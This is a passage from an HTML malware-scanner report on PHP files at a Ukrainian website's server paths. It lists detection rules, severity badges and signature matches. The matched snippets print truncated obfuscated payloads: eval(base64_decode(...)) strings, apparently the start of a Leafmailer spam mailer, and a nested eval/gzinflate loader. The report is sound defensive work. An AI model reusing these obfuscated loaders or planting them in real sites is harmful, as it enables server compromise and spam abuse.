</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 162cf671 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 162cf671)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">hcnJheV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 407651f7 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 407651f7)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">wcmludG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 4a069524 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 4a069524)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">aW5jbHVkZ</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7186bb8d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7186bb8d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RfUE9TV</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">N0cl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7f5d33bf <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7f5d33bf)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">JF9SRVFVRVNU</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">leGVjK</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 963e968a <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 963e968a)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">pbmNsdWRl</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign a408f408 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: a408f408)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">c3Rhd</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ae7830db <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ae7830db)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">YmFzZTY0</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d30fc49e <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d30fc49e)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">b3Blb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Z1bmN0aW9u</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">VjaG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign e6546205 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: e6546205)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">kX1BPU1</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ee1cb326 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ee1cb326)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">9wZW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign ff4f5344 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: ff4f5344)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">FycmF5X</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_100").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/gykbt.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 52.73 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-04-08 21:17:22</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-04-08 21:17:22</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 14</span><br><table id="file_101" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwRtF3uTXMQDYJ2O8umyGtGsMsdkHxFjTSqmY1beQbJ7x0Ls9WyJ6ASK9QrEzGTf7IdPIPre8mqhI9eodyFMNj9YGRJDn4CcfJ2kg2eIoDbWPphXTbRPGymWPdoz2ZTpl06XQOtLLx7gsxvK3Irk9BTH1PqIsFBobKuAAvoc0SoCKu93DeTNctdZDxvZmgGsswABEIsOaUOsA2MUKfu9SxAH8JNoIXBOCmP6yV9cgTI617pcLxXozLLp4CBgY6DKMgckypa8MEWDrpi0uDksDJcp9nY1MVP05l9w4HNHAr3s0crA8C0jhvHHHTYlLPxeNcFoVSCkMXiWORKVrbYrMaYRShWQq0pJFhNkC7vDJ1G0TBv51pj82gTS...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">strrev</span><span style="color: #007700">(</span><span style="color: #0000BB">gzinflate</span><span style="color: #007700">(</span><span style="color: #0000BB">$_xwynUOL</span><span style="color: #007700">(</span><span style="color: #0000BB">_6Zys</span><span style="color: #007700">(</span><span style="color: #0000BB">$_cCzFdr</span><span style="color: #007700">))));}eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(</span><span style="color: #0000BB">_r5Me0FNrh83UY9xZt</span><span style="color: #007700">(</span><span style="color: #DD0000">'4tNCPdUMNHGp37TLg3k6pPY5CIf6KWFdMqFEChJKXgZbi1BELpXmoM6ztMvoPnWg4eQUvTkc3PmAcwmls4bLBEQTSX1ckJGas66NtmwXAaljK4uUMePcJnGVpTYHwR</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2P</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'ZnVuY3Rpb24gXzZaeXMoJF90V00xZ1k3aU8peyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczNjM2MzAnKSkpOyRfdFdNMWdZN2lPPXN1YnN0cigkX3RXTTFnWTdpTywoaW50KShoZXgyYmluKCczMCcpKSwoaW50KShoZXgyYmluKCcyZDM2MzYzNicpKSk7cmV0dXJuICRfdFdNMWdZN2lPO30kX21FaDh2PSdfNlp5cyc7JF94d3luVU9MPSdiYXNlNjRfZGVjb2RlJztmdW5jdGlvbiBfcjVNZTBGTnJoODNVWTl4WnQoJF9jQ3pGZHIpe2dsb2JhbCAkX21FaDh2O2dsb2JhbCAkX3h3eW5VT0w7cmV0dXJuIHN0cnJldihnemluZmxhdGUoJF94d3luVU9MKF82WnlzKCRfY0N6RmRyKSkpKTt9ZXZhbChldmFs...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function str_rot13 exec_str_rot13 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Encoded Function `exec`</p><p><i>[<a href="https://www.php.net/exec" target="_blank" class="text-primary">https://www.php.net/exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">RkRP</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 085a0329 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 085a0329)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">iYXNlNj</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 0f37c730 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 0f37c730)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">mdW5jdGlvb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 11413268 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 11413268)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 7830f7a6 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 7830f7a6)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">nemluZmxhdG</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 80e70adc <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 80e70adc)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700"><?</span><span style="color: #0000BB">php<br /></span><span style="color: #007700">eval</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 91535293 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 91535293)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ldmFs</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign d97f004d <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: d97f004d)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">ZXZhb</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign de12c454 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: de12c454)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">V2YW</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign f9dc0a55 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: f9dc0a55)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'base64_decode'</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_101").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/bartolini/bartolini.com.ua/jilbl.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 216.49 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2026-01-31 20:53:30</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2026-01-31 20:53:30</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 2</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 21</span><br><table id="file_102" class="table container table-sm table-striped table-borderless"><thead ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICAgfQogICAgZWxzZSB7CiA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval (</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b3JkKSBhbmQgJF9TRVNTSU9OWyRzZXNzaW9uY29kZV0gIT0gJHBhc3N3b3JkKXsKICAgIGlmIChpc3NldCgkX1JFUVVFU1RbJ3Bhc3MnXSkgYW5kICRfUkVRVUVTVFsncGFzcyddID09ICRwYXNzd29yZCkgewogICAgICAgICRfU0VTU0lPTlskc2Vzc2lvbmNvZGVdID0gJHBhc3N3b3JkOwogICA...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 6</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">"CnNlc3Npb25fc3RhcnQoKTsKZXJyb3JfcmVwb3J0aW5nKDApOwpzZXRfdGltZV9saW1pdCgwKTsKaW5pX3NldCgibWVtb3J5X2xpbWl0IiwtMSk7CgokbGVhZlsndmVyc2lvbiddPSIyLjgiOwokbGVhZlsnd2Vic2l0ZSddPSJsZWFmbWFpbGVyLnB3IjsKCgokc2Vzc2lvbmNvZGUgPSBtZDUoX19GSUxFX18pOwppZighZW1wdHkoJHBhc3N3b</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
